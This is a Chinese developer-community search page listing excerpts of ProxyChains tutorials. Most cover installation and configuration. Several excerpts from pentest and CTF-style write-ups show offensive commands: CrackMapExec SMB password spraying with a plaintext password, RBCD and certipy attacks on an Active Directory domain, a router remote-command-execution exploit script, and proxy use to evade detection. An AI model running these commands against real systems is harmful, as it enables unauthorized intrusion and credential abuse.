首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏醉梦轩

    Ubuntu安装Proxychains

    在Ubuntu上安装Proxychains的方法是: apt-get install proxychains 安装的是3.1版本,配置文件的路径是:/etc/proxychains.conf,内容如下 使用的时候在命令行前加上proxychains即可。 root@ubuntu-pc:~# proxychains telnet www.baidu.com 80 ProxyChains-3.1 (http://proxychains.sf.net) Trying proxychains命令其实是个脚本文件,内容如下: #! git clone https://github.com/rofl0r/proxychains cd proxychains .

    14.1K30发布于 2018-07-06
  • 编译安装 proxychains-ng proxychains4

    html]# cd proxychains-ng/ [root@localhost proxychains-ng]# ls AUTHORS configure COPYING Makefile README src tests TODO tools VERSION [root@localhost proxychains-ng]# . [root@localhost proxychains-ng]# make install . /tools/install.sh -D -m 755 proxychains4 /usr/bin/proxychains4 [root@localhost proxychains-ng]# make /tools/install.sh -D -m 644 src/proxychains.conf /etc/proxychains.conf 配置 /etc/proxychains.conf 如果对你有帮助

    1.5K10发布于 2020-12-30
  • 来自专栏Java Tale

    proxychains4 使用教程

    一、什么是 proxychains4? proxychains4 是一个代理工具,可以强制任何程序通过代理访问网络,即使该程序本身不支持代理设置。 # CentOS/RHEL yum install proxychains4 -y # macOS brew install proxychains-ng 三、配置 1. 配置文件位置 /etc/proxychains4.conf # 系统级配置 ~/.proxychains/proxychains.conf # 用户级配置 2. ) echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf # 测试 proxychains4 curl ip.sb # 常用命令 proxychains4 docker pull <镜像> proxychains4 git clone <仓库> proxychains4 curl <网址> proxychains4 wget <文件> # 启动 SSH

    20110编辑于 2026-04-17
  • 来自专栏菜鸟程序员

    Kali-linux设置ProxyChains

    ProxyChains是Linux和其他Unices下的代理工具。 ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序,直接断开接收方和发送方的连接。本节将介绍设置ProxyChains的方法。 设置ProxyChains的具体操作步骤如下所示。 (1)打开ProxyChains配置文件。 执行命令如下所示: root@kali:~# proxychains msfconsole ProxyChains-3.1 (http://proxychains.sf.net) |DNS-request 表示ProxyChains设置成功。

    7.3K30发布于 2018-06-29
  • 来自专栏乌鸦安全

    Macos 配置ProxyChains设置网络代理

    01 ProxyChains介绍 ProxyChains遵循GNU协议的一款适用于linux系统的网络代理设置工具。 参考资料: https://www.jianshu.com/p/3f392367b41f 02 ProxyChains的适用场景 在以下几种场合,你可以考虑使用ProxyChains:需要通过代理上网, 可以简单理解为安卓手机获取了ROOT权限(这种说法不一定准确) 本机系统是最新版Big Sur,在使用proxychains4的时候,需要先关闭SIP策略,否则proxychains4是无法生效的。 03 安装proxychains 这里直接使用brew进行安装(需要提前配置) brew install proxychains-ng 安装完成之后,准备配置proxychains.conf文件,但最好提前将该文件进行备份 然后在不使用proxychains4的情况下测试 curl vps地址:5551 ? 服务端也收到了测试的ip地址 ? 查到当前的地址是国内电信 ? 使用proxychains4来进行测试 ?

    5.9K40发布于 2021-08-05
  • 来自专栏FreeBuf

    ProxyChains实现自动添加代理逃避检测

    这里介绍一款代理工具ProxyChainsProxyChains是一个开源代理工具,能够强制使任何应用的TCP连接使用SOCKS4,SOCKS或者HTTP(S)代理进行连接。 首先简单介绍一下ProxyChains的使用。 Kali中自带ProxyChains,也可以从https://github.com/rofl0r/proxychains-ng下载安装。 ProxyChains运行的所有配置都在/etc/proxychains.conf中: 在[ProxyList]下面添加代理IP和端口,可以任意添加代理,一行一个记录。 大致了解了proxychains的配置项之后,可以测试一下proxychains使用代理访问的情况,proxychains使用起来也非常简单,命令形式为: 接下来可以实践一下proxychains 至此可以利用该脚本简单实现proxychains自动添加代理逃避检测。

    3.6K50发布于 2018-02-24
  • 来自专栏Cyber Security

    【内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

    Linux Proxychains使用 安装使用:https://blog.csdn.net/qq_53086690/article/details/121779832 代理配置:Proxychains.conf 代理调用:Proxychains 命令 这里我直接使用kali自带的CrackMapExec proxychains crackmapexec smb 192.168.3.21-32 -u administrator @#45' proxychains crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin! @#45' --local-auth proxychains crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin! @#45’ 密码喷射本地登录: proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!

    84910编辑于 2024-07-18
  • 来自专栏智慧协同

    Mac 下安装及配置 ProxyChains-NG 实现终端下代理

    使用 Homebrew 安装 brew install proxychains-ng 配置 vim /usr/local/etc/proxychains.conf 增加如下配置: image.png 使用 proxychains4 curl twitter.com

    2K30发布于 2019-08-20
  • 来自专栏高性能分布式系统设计

    proxychains 一个好用的终端用代理拦截器

    proxychains就可以解决这个问题。 安装好proxychains以后,配置一个短名字 pc4 pc4 brew install luajit 就可以很快安装好luajit了。

    816110发布于 2018-04-13
  • 来自专栏Java实战博客

    Proxychains-ng – 一个开源的终端代理工具 – Mac支持

    此时我们就需要Proxychains-ng服务的支持了 本来用brew install proxychains-ng 就可以了的,但是受限于Mac的环境,brew安装的proxychains-ng不能正常使用 Proxychains-ng下载地址:https://github.com/rofl0r/proxychains-ng/releases/tag/v4.16 Mac M系列芯片需要关闭SIP模式才能使用 proxychains-ng,教材在:https://www.zanglikun.com/14963.html 常规系统安装proxychains-ng(Apple 芯片必须此方式不可用) 我把官方的README.md /proxychains4 -f src/proxychains.conf telnet google.com 80 Mac M芯片安装proxychains-ng 解压压缩包并进入文件夹 # 这里我是模拟的命令 ,你可以直接解压,然后在终端进入解压后的文件夹 unzip proxychains-ng-4.16.zip && cd proxychains-ng-4.16 第一次编译 arm64e 环境 cd proxychains-ng

    3.4K20编辑于 2023-05-09
  • 来自专栏老高的技术博客

    在MAC下使用proxychain

    原版项目:proxychains 项目地址:proxychains-ng ps.ng == (new generation) 新一代的意思 proxychains的运行原理是在程序运行时动态接管其与网络相关的库 如何安装: brew install proxychains-ng # ==> Downloading https://homebrew.bintray.com/bottles/proxychains-ng files, 92K # 注意与上面的路径相同 /usr/local/Cellar/proxychains-ng/4.10 # 下面的意思是把proxychains4放到系统路径,以后可以直接调用proxychains + 命令执行即可 ln -s /usr/local/Cellar/proxychains-ng/4.10/bin/proxychains4 /usr/local/bin/proxychains 使用方法 proxychains brew update 如果想让某个app直接使用到proxychains,可以这样 proxychains open -a Airy.app

    1.4K10编辑于 2022-12-28
  • 来自专栏TeamsSix的网络空间安全专栏

    CS学习笔记 | 21、反向转发通道的建立

    0x00 前言 这一节将介绍使用 ProxyChains 进行代理转发与使用反向转发的方法。 0x01 使用 ProxyChains 进行代理转发 介绍 使用 ProxyChains 可以使我们为没有代理配置功能的软件强制使用代理 和上一节中介绍的一致,开启一个 socks 代理服务 配置 /etc /proxychains.conf 文件 运行 proxychains + 待执行命令 演示 接下来继续上一节中的演示环境: 攻击机 IP:192.168.175.200 上线主机:外部IP 192.168.175.130 [proxychains] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu .4[proxychains] DLL init: proxychains-ng 4.14[proxychains] Strict chain ... 192.168.175.200:9527 .

    1.3K10发布于 2020-09-18
  • 来自专栏Java实战博客

    Linux终端代理 – Proxychain4 安装 – 测试

    /proxychains-ng-4.16 编译 . /tools/install.sh -D -m 755 proxychains4-daemon /usr/bin/proxychains4-daemon [root@VM-4-14-centos proxychains-ng /tools/install.sh -D -m 644 src/proxychains.conf /etc/proxychains.conf 【可选】搭配自己的VPN 可翻阅本站教程:Linux 安装Clash curl cip.cc [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib /libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16 [proxychains] Strict chain ... 127.0.0.1

    2.9K30编辑于 2023-06-26
  • 来自专栏FreeBuf

    如何在macOS上监听单个应用HTTPS流量

    使用proxychains来为制定应用提供代理服务; 4. 此时你需要使用下面的命令来解决这个问题: cp`which curl` . proxychains4-f proxychains.conf . 接下来让我们测试一下: $proxychains4 python req.py # automatically finds proxychains.conf [proxychains]config file found: /Users/caleb/secret-shit-omg/proxychains.conf [proxychains]preloading /usr/local/Cellar/proxychains-ng req.py [proxychains]config file found: /Users/caleb/secret-shit-omg/proxychains.conf [proxychains]preloading

    2.1K50发布于 2018-02-26
  • 来自专栏linux教程

    【网络工具】ProxyChains配置教程 — 使国内Linux服务器能访问下载GitHub资源

    proxychains4 -y Centos系统安装 1、有epel源 yum install -y proxychains-ng 2、无epel源 (1)下载源码 git clone https:/ /ghproxy.com/https://github.com/rofl0r/proxychains-ng.git (2)编译和安装 yum install gcc cd proxychains-ng 2、安装后默认配置文件在 /etc/proxychains.conf 或 /etc/proxychains4.conf ,通过vi或nano编辑该文件,拉到最下面填入自己的代理信息,如果没设置用户密码认证则省略 4、但proxychains4太长不好记忆,可以通过alias给它设置了一个别名 pc 。 cip.cc 5、也可以命令行直接输入 proxychains4 bash ,这样就能新建一个具有全局代理功能的新终端,不需要在每条命令前都加proxychains了,输入exit退出终端。

    19.8K30编辑于 2023-05-18
  • 来自专栏Naraku的专栏

    实习记录(一) - 内网渗透之Neo-reGeorg

    Proxychains-Ng 安装 # Linux $ git clone https://github.com/rofl0r/proxychains-ng.git # 下载 $ cd proxychains-ng /src/proxychains.conf /etc/proxychains.conf # 拷贝配置文件 $ cd .. && rm -rf proxychains-ng # 删除目录(可不执行) # Mac $ brew install proxychains-ng 配置 # 找到proxychains.conf文件所在的路径 # 将socks4 127.0.0.1 9095改为 socks5 127.0.0.1 1080 $ vim /etc/proxychains.conf # Kali $ vim /usr/local/etc/proxychains.conf 测试 # 用法: proxychains4 XXX $ proxychains4 curl ifconfig.io 联合BurpSuite 如果要使用BurpSuite抓包进行如暴力破解等操作,还需要另外配置一下

    2.5K20发布于 2021-07-29
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透

    2)在攻击机中修改 proxychains4.conf配置文件,并在其底部添加一行socks5 192.168.0.25 8888参数来完成 proxychains代理配置,如图1-13所示。 3)当配置完 proxychains 代理后,即可在攻击机执行proxychains rdesktop 192.168.52.12命令来连接FTP服务器,如图1-4所示,通过所建立的socks协议隧道, 3)在攻击机中修改 proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 8888参数来完成proxychains代理配置,如图1-7所示。 3)在攻击机中修改 proxychains4.conf配置文件,并在其底部添加一行socks5 192.168.0.25 7777参数来完成 proxychains代理配置,如图1-11所示。 4)在攻击机中修改 proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 8888参数来完成proxychains代理配置,如图1-16所示。

    2K152编辑于 2023-11-01
  • 来自专栏红蓝对抗

    内网渗透—春秋云镜篇之2022网鼎杯

    -c all -ns 172.22.15.13 --zip --dns-tcp 查看域内关系 发现此用户对XR-0687主机有GenericWrite权限,可尝试RBCD获取管理员权限 RBCD攻击 proxychains proxychains python3 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'qwq$' proxychains python3 getST.py xiaorang.lab/'qwq':'Qq123456 proxychains certipy find -u 'lixiuying@xiaorang.lab' -password 'winniethepooh' -dc-ip 172.22.15.13 - 申请证书模板 要尝试两次才能成功 proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA

    94710编辑于 2024-02-27
  • 来自专栏ITJoker的吹逼专栏

    如何让小米路由4C刷上Openwrt20【教程】

    以及后续编译固件需要访问国外网站 从中访问国外网站的工具,我使用proxychains,具体配置详情见百度~ 0x01 首先对小米路由原生固件进行破解,通过Github搜索,找到exp脚本。 proxychains git clone https://github.com/acecilia/OpenWRTInvasion.git cd OpenWRTInvasion sudo proxychains pip3 install -r requirements.txt sudo proxychains python3 remote_command_execution_vulnerability.py git clone https://github.com/ITJoker233/lede cd lede sudo proxychains apt-get update sudo proxychains /feeds.conf.default proxychains ./scripts/feeds update -a .

    3.9K31编辑于 2022-08-30
  • 来自专栏FreeBuf

    通过RedShell将命令执行记录在Cobalt Strike团队服务器中

    概述 RedShell是一款交互式命令行工具,它可以帮助广大研究人员通过proxychains(一款命令行代理神器)来执行命令,并自动将命令执行日志记录在Cobalt Strike团队服务器之中。 安装依赖组件: pip3 install -r requirements.txt 安装proxychains-ng:https://github.com/rofl0r/proxychains-ng apt ] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so .4[proxychains] DLL init: proxychains-ng 4.14[proxychains] Strict chain  ...  127.0.0.1:48199  ...  192.168.1.14 OK[proxychains] Strict chain  ...  127.0.0.1:48199  ...  192.168.1.14:135  ...  

    48010编辑于 2023-04-26
领券